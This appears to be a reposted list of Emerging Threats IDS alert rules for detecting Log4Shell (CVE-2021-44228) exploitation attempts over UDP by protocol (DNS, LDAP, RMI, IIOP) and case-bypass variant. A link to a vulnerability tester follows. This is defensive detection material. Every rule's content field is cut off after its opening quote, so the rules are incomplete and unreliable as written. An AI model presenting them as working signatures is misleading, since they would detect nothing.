alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass (CVE-2021-44228)"; content:"
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp dns) (CVE-2021-44228)"; content:"
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (CVE-2021-44228)"; content:"
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228)"; content:"
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (CVE-2021-44228)"; content:"
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228)"; content:"
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET INFO Possible Apache log4j RCE Attempt - Any Protocol (CVE-2021-44228)"; content:"
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET INFO Possible Apache log4j RCE Attempt - Any Protocol lower Bypass (CVE-2021-44228)"; content:"
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET INFO Possible Apache log4j RCE Attempt - Any Protocol upper Bypass (CVE-2021-44228)"; content:"

Also attached, a Log4Shell vulnerability tester:

https://log4shell.huntress.com/

Project address

GitHub

Please credit the source and include a link when reposting.
